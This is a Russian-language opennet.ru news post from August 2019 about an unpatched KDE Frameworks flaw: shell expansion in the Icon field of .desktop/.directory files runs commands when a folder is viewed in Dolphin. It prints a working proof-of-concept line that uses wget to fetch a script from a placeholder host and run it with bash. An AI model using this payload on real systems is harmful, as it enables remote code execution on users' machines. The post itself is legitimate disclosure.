Исходное сообщение
"Уязвимость в KDE, позволяющая выполнить код при просмотре сп..." Отправлено opennews, 07-Авг-19 12:31
В KDE выявлена (https://twitter.com/zer0pwn/status/1158433002239746048) уязвимость (https://gist.githubusercontent.com/zeropwn/630832df151029cb8...), позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 (https://kde.org/announcements/kde-frameworks-5.60.0.php) и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен). Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию  KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды.  Вопреки спецификации XDG выполнение раскрытия (https://userbase.kde.org/KDE_System_Administration/Configura...) shell-конструкций производится без ограничения типа настроек, т.е. не только при определении командной строки для запуска приложения, но и при указании отображаемых по умолчанию пиктограмм. Например, для атаки достаточно (https://github.com/RevThreat/KDE-ARBITRARY-CODE-EXECUTION-AU.../) отправить пользователю zip-архив каталогом, содержащим файл ".directory", включающим конструкцию вида:    [Desktop Entry]    Type=Directory    Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh) При попытке просмотра содержимого архива в файловом менеджере Dolphin  будет загружен и выполнен скрипт https://example.com/FILENAME.sh. URL: https://packetstormsecurity.com/files/153874/KDE-4-5-KDeskto... Новость: https://www.opennet.ru/opennews/art.shtml?num=51235